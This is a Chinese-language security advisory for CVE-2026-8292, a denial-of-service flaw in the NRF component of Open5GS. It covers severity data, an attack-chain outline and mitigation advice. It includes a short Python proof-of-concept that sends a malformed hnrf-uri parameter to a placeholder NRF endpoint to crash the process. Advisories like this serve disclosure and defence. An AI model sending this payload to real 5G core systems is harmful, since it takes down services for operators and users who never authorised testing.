IPBUF安全漏洞报告
English
CVE-2026-8292 CVSS 4.3 中危

CVE-2026-8292 Open5GS NRF组件拒绝服务漏洞

披露日期: 2026-05-11
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8292
漏洞类型
拒绝服务
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open5GS

相关标签

DoSOpen5GSNRFCVE-2026-8292Denial of Service

漏洞概述

Open5GS 2.7.7及之前版本存在安全漏洞,位于NRF组件的yuarel_parse函数中。攻击者可通过恶意操作hnrf-uri参数触发拒绝服务。该漏洞可远程利用,且无需用户交互,目前利用代码已公开,厂商尚未修复。

技术细节

该漏洞源于Open5GS NRF(网络存储库功能)组件在处理URI时的逻辑缺陷。具体受影响代码位于/lib/sbi/conv.c文件中的yuarel_parse函数。该函数在解析hnrf-uri参数时,未能正确处理特定格式的输入数据。攻击者可以通过网络向受影响的Open5GS节点发送特制的数据包,其中包含经过精心构造的hnrf-uri参数。由于解析器缺乏足够的鲁棒性,处理此类异常输入会导致程序崩溃或资源耗尽,从而引发拒绝服务。根据CVSS 3.1向量,该攻击具有低复杂度,需要低权限,且可对可用性造成影响。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,寻找暴露的Open5GS NRF组件SBI接口。
STEP 2
2. 构造攻击载荷
攻击者利用漏洞细节,构造包含恶意hnrf-uri参数的HTTP请求。
STEP 3
3. 发送恶意请求
攻击者将恶意请求发送至目标NRF接口的yuarel_parse处理函数。
STEP 4
4. 触发拒绝服务
解析函数处理异常参数失败,导致Open5GS进程崩溃,服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Proof of Concept for CVE-2026-8292 # This script attempts to trigger the DoS by sending a malformed hnrf-uri to the NRF component. import requests def trigger_dos(target_url): # Malformed hnrf-uri parameter designed to crash yuarel_parse malicious_payload = { "hnrf-uri": "http://%%%@%%%/invalid" } try: print(f"Sending payload to {target_url}...") response = requests.post(target_url, data=malicious_payload, timeout=5) print(f"Request sent. Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request failed (Service might be down): {e}") if __name__ == "__main__": # Replace with actual target endpoint target = "http://<target-ip>:<port>/nrf-nf-management" trigger_dos(target)

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施
建议在防火墙层面限制对Open5GS NRF组件端口的访问,仅允许可信的内部网元IP进行通信。同时,部署系统监控脚本,一旦检测到Open5GS服务异常退出,立即自动重启服务以维持业务连续性,直到官方补丁发布。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。